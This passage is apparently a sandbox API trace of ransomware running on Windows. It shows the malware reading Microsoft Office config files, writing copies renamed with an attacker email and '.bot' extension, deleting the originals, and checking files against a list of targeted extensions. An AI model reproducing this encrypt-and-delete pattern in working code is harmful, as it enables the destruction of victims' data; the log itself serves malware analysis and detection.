	[0163.968] WriteFile (in: hFile=0x398, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x350, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x350, lpOverlapped=0x0) returned 1
	[0163.969] ReadFile (in: hFile=0x3d0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.969] WriteFile (in: hFile=0x398, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.969] SetEndOfFile (hFile=0x398) returned 1
	[0163.970] CloseHandle (hObject=0x398) returned 1
	[0163.970] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.970] SetEndOfFile (hFile=0x3d0) returned 1
	[0163.973] CloseHandle (hObject=0x3d0) returned 1
	[0163.973] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESN.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.973] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESN.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdresn.cfg")) returned 1
	[0163.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESN.CFG") returned 66
	[0163.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESN.CFG") returned 66
	[0163.974] lstrlenW (lpString=".doc") returned 4
	[0163.974] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0163.974] lstrlenW (lpString=".docx") returned 5
	[0163.974] lstrcmpiW (lpString1=".docx", lpString2="N.CFG") returned -1
	[0163.974] lstrlenW (lpString=".pdf") returned 4
	[0163.974] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0163.974] lstrlenW (lpString=".xls") returned 4
	[0163.974] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0163.974] lstrlenW (lpString=".xlsx") returned 5
	[0163.974] lstrcmpiW (lpString1=".xlsx", lpString2="N.CFG") returned -1
	[0163.974] lstrlenW (lpString=".ppt") returned 4
	[0163.974] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0163.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESN.CFG") returned 66
	[0163.974] lstrlenW (lpString=".zip") returned 4
	[0163.974] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0163.974] lstrlenW (lpString=".rar") returned 4
	[0163.974] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0163.974] lstrlenW (lpString=".bz2") returned 4
	[0163.974] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0163.974] lstrlenW (lpString=".7z") returned 3
	[0163.974] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0163.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESN.CFG") returned 66
	[0163.974] lstrlenW (lpString=".dbf") returned 4
	[0163.974] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0163.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESN.CFG") returned 66
	[0163.974] lstrlenW (lpString=".1cd") returned 4
	[0163.974] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0163.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESN.CFG") returned 66
	[0163.974] lstrlenW (lpString=".jpg") returned 4
	[0163.974] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0163.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESN.CFG") returned 66
	[0163.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESN.CFG") returned 66
	[0163.974] lstrlenW (lpString=".doc") returned 4
	[0163.974] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0163.974] lstrlenW (lpString=".docx") returned 5
	[0163.975] lstrcmpiW (lpString1=".docx", lpString2="N.CFG") returned -1
	[0163.975] lstrlenW (lpString=".pdf") returned 4
	[0163.975] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0163.975] lstrlenW (lpString=".xls") returned 4
	[0163.975] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0163.975] lstrlenW (lpString=".xlsx") returned 5
	[0163.975] lstrcmpiW (lpString1=".xlsx", lpString2="N.CFG") returned -1
	[0163.975] lstrlenW (lpString=".ppt") returned 4
	[0163.975] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0163.975] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESN.CFG") returned 66
	[0163.975] lstrlenW (lpString=".zip") returned 4
	[0163.975] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0163.975] lstrlenW (lpString=".rar") returned 4
	[0163.975] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0163.975] lstrlenW (lpString=".bz2") returned 4
	[0163.975] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0163.975] lstrlenW (lpString=".7z") returned 3
	[0163.975] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0163.975] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESN.CFG") returned 66
	[0163.975] lstrlenW (lpString=".dbf") returned 4
	[0163.975] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0163.975] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESN.CFG") returned 66
	[0163.975] lstrlenW (lpString=".1cd") returned 4
	[0163.975] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0163.975] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESN.CFG") returned 66
	[0163.975] lstrlenW (lpString=".jpg") returned 4
	[0163.975] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0163.975] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0163.975] lstrlenW (lpString="SCHDRESP.CFG") returned 12
	[0163.975] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESP.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdresp.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0163.977] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=833) returned 1
	[0163.977] CloseHandle (hObject=0x3d0) returned 1
	[0163.977] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESP.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdresp.cfg")) returned 0x20
	[0163.977] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESP.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdresp.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.977] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESP.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdresp.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0163.977] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.977] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.977] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESP.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdresp.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0163.978] GetLastError () returned 0x0
	[0163.978] ReadFile (in: hFile=0x3d0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x341, lpOverlapped=0x0) returned 1
	[0163.979] WriteFile (in: hFile=0x398, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x350, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x350, lpOverlapped=0x0) returned 1
	[0163.980] ReadFile (in: hFile=0x3d0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.980] WriteFile (in: hFile=0x398, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.981] SetEndOfFile (hFile=0x398) returned 1
	[0163.981] CloseHandle (hObject=0x398) returned 1
	[0163.981] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.981] SetEndOfFile (hFile=0x3d0) returned 1
	[0163.983] CloseHandle (hObject=0x3d0) returned 1
	[0163.983] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESP.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.983] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESP.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdresp.cfg")) returned 1
	[0163.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESP.CFG") returned 66
	[0163.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESP.CFG") returned 66
	[0163.984] lstrlenW (lpString=".doc") returned 4
	[0163.984] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0163.984] lstrlenW (lpString=".docx") returned 5
	[0163.984] lstrcmpiW (lpString1=".docx", lpString2="P.CFG") returned -1
	[0163.984] lstrlenW (lpString=".pdf") returned 4
	[0163.984] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0163.984] lstrlenW (lpString=".xls") returned 4
	[0163.984] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0163.984] lstrlenW (lpString=".xlsx") returned 5
	[0163.984] lstrcmpiW (lpString1=".xlsx", lpString2="P.CFG") returned -1
	[0163.984] lstrlenW (lpString=".ppt") returned 4
	[0163.984] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0163.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESP.CFG") returned 66
	[0163.984] lstrlenW (lpString=".zip") returned 4
	[0163.984] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0163.984] lstrlenW (lpString=".rar") returned 4
	[0163.984] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0163.984] lstrlenW (lpString=".bz2") returned 4
	[0163.984] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0163.984] lstrlenW (lpString=".7z") returned 3
	[0163.984] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0163.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESP.CFG") returned 66
	[0163.984] lstrlenW (lpString=".dbf") returned 4
	[0163.984] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0163.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESP.CFG") returned 66
	[0163.984] lstrlenW (lpString=".1cd") returned 4
	[0163.985] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0163.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESP.CFG") returned 66
	[0163.985] lstrlenW (lpString=".jpg") returned 4
	[0163.985] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0163.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESP.CFG") returned 66
	[0163.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESP.CFG") returned 66
	[0163.985] lstrlenW (lpString=".doc") returned 4
	[0163.985] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0163.985] lstrlenW (lpString=".docx") returned 5
	[0163.985] lstrcmpiW (lpString1=".docx", lpString2="P.CFG") returned -1
	[0163.985] lstrlenW (lpString=".pdf") returned 4
	[0163.985] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0163.985] lstrlenW (lpString=".xls") returned 4
	[0163.985] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0163.985] lstrlenW (lpString=".xlsx") returned 5
	[0163.985] lstrcmpiW (lpString1=".xlsx", lpString2="P.CFG") returned -1
	[0163.985] lstrlenW (lpString=".ppt") returned 4
	[0163.985] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0163.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESP.CFG") returned 66
	[0163.985] lstrlenW (lpString=".zip") returned 4
	[0163.985] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0163.985] lstrlenW (lpString=".rar") returned 4
	[0163.985] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0163.985] lstrlenW (lpString=".bz2") returned 4
	[0163.985] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0163.985] lstrlenW (lpString=".7z") returned 3
	[0163.985] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0163.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESP.CFG") returned 66
	[0163.985] lstrlenW (lpString=".dbf") returned 4
	[0163.985] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0163.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESP.CFG") returned 66
	[0163.985] lstrlenW (lpString=".1cd") returned 4
	[0163.985] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0163.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESP.CFG") returned 66
	[0163.986] lstrlenW (lpString=".jpg") returned 4
	[0163.986] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0163.986] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0163.986] lstrlenW (lpString="SCHDREST.CFG") returned 12
	[0163.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREST.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdrest.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0163.986] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=840) returned 1
	[0163.986] CloseHandle (hObject=0x3d0) returned 1
	[0163.986] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREST.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdrest.cfg")) returned 0x20
	[0163.986] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREST.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdrest.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREST.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdrest.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0163.987] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.987] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREST.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdrest.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0163.988] GetLastError () returned 0x0
	[0163.988] ReadFile (in: hFile=0x3d0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x348, lpOverlapped=0x0) returned 1
	[0163.989] WriteFile (in: hFile=0x398, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x350, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x350, lpOverlapped=0x0) returned 1
	[0163.990] ReadFile (in: hFile=0x3d0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.990] WriteFile (in: hFile=0x398, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.990] SetEndOfFile (hFile=0x398) returned 1
	[0163.990] CloseHandle (hObject=0x398) returned 1
	[0163.990] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.990] SetEndOfFile (hFile=0x3d0) returned 1
	[0163.992] CloseHandle (hObject=0x3d0) returned 1
	[0163.992] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREST.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.992] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREST.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdrest.cfg")) returned 1
	[0163.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREST.CFG") returned 66
	[0163.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREST.CFG") returned 66
	[0163.993] lstrlenW (lpString=".doc") returned 4
	[0163.993] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0163.993] lstrlenW (lpString=".docx") returned 5
	[0163.993] lstrcmpiW (lpString1=".docx", lpString2="T.CFG") returned -1
	[0163.993] lstrlenW (lpString=".pdf") returned 4
	[0163.993] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0163.993] lstrlenW (lpString=".xls") returned 4
	[0163.993] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0163.993] lstrlenW (lpString=".xlsx") returned 5
	[0163.993] lstrcmpiW (lpString1=".xlsx", lpString2="T.CFG") returned -1
	[0163.993] lstrlenW (lpString=".ppt") returned 4
	[0163.993] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0163.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREST.CFG") returned 66
	[0163.993] lstrlenW (lpString=".zip") returned 4
	[0163.993] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0163.993] lstrlenW (lpString=".rar") returned 4
	[0163.994] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0163.994] lstrlenW (lpString=".bz2") returned 4
	[0163.994] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0163.994] lstrlenW (lpString=".7z") returned 3
	[0163.994] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0163.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREST.CFG") returned 66
	[0163.994] lstrlenW (lpString=".dbf") returned 4
	[0163.994] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0163.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREST.CFG") returned 66
	[0163.994] lstrlenW (lpString=".1cd") returned 4
	[0163.994] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0163.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREST.CFG") returned 66
	[0163.994] lstrlenW (lpString=".jpg") returned 4
	[0163.994] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0163.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREST.CFG") returned 66
	[0163.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREST.CFG") returned 66
	[0163.994] lstrlenW (lpString=".doc") returned 4
	[0163.994] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0163.994] lstrlenW (lpString=".docx") returned 5
	[0163.994] lstrcmpiW (lpString1=".docx", lpString2="T.CFG") returned -1
	[0164.082] lstrlenW (lpString=".pdf") returned 4
	[0164.082] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0164.082] lstrlenW (lpString=".xls") returned 4
	[0164.082] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0164.082] lstrlenW (lpString=".xlsx") returned 5
	[0164.082] lstrcmpiW (lpString1=".xlsx", lpString2="T.CFG") returned -1
	[0164.082] lstrlenW (lpString=".ppt") returned 4
	[0164.082] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0164.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREST.CFG") returned 66
	[0164.082] lstrlenW (lpString=".zip") returned 4
	[0164.082] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0164.082] lstrlenW (lpString=".rar") returned 4
	[0164.082] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0164.082] lstrlenW (lpString=".bz2") returned 4
	[0164.082] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0164.082] lstrlenW (lpString=".7z") returned 3
	[0164.082] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0164.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREST.CFG") returned 66
	[0164.082] lstrlenW (lpString=".dbf") returned 4
	[0164.082] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0164.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREST.CFG") returned 66
	[0164.082] lstrlenW (lpString=".1cd") returned 4
	[0164.082] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0164.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREST.CFG") returned 66
	[0164.082] lstrlenW (lpString=".jpg") returned 4
	[0164.083] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0164.083] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0164.083] lstrlenW (lpString="SECREC.CFG") returned 10
	[0164.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECREC.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secrec.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0164.105] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=664) returned 1
	[0164.105] CloseHandle (hObject=0x3b8) returned 1
	[0164.105] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECREC.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secrec.cfg")) returned 0x20
	[0164.105] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECREC.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secrec.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.105] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECREC.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secrec.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0164.106] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.106] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.106] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECREC.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secrec.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0164.535] GetLastError () returned 0x0
	[0164.535] ReadFile (in: hFile=0x3b8, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x298, lpOverlapped=0x0) returned 1
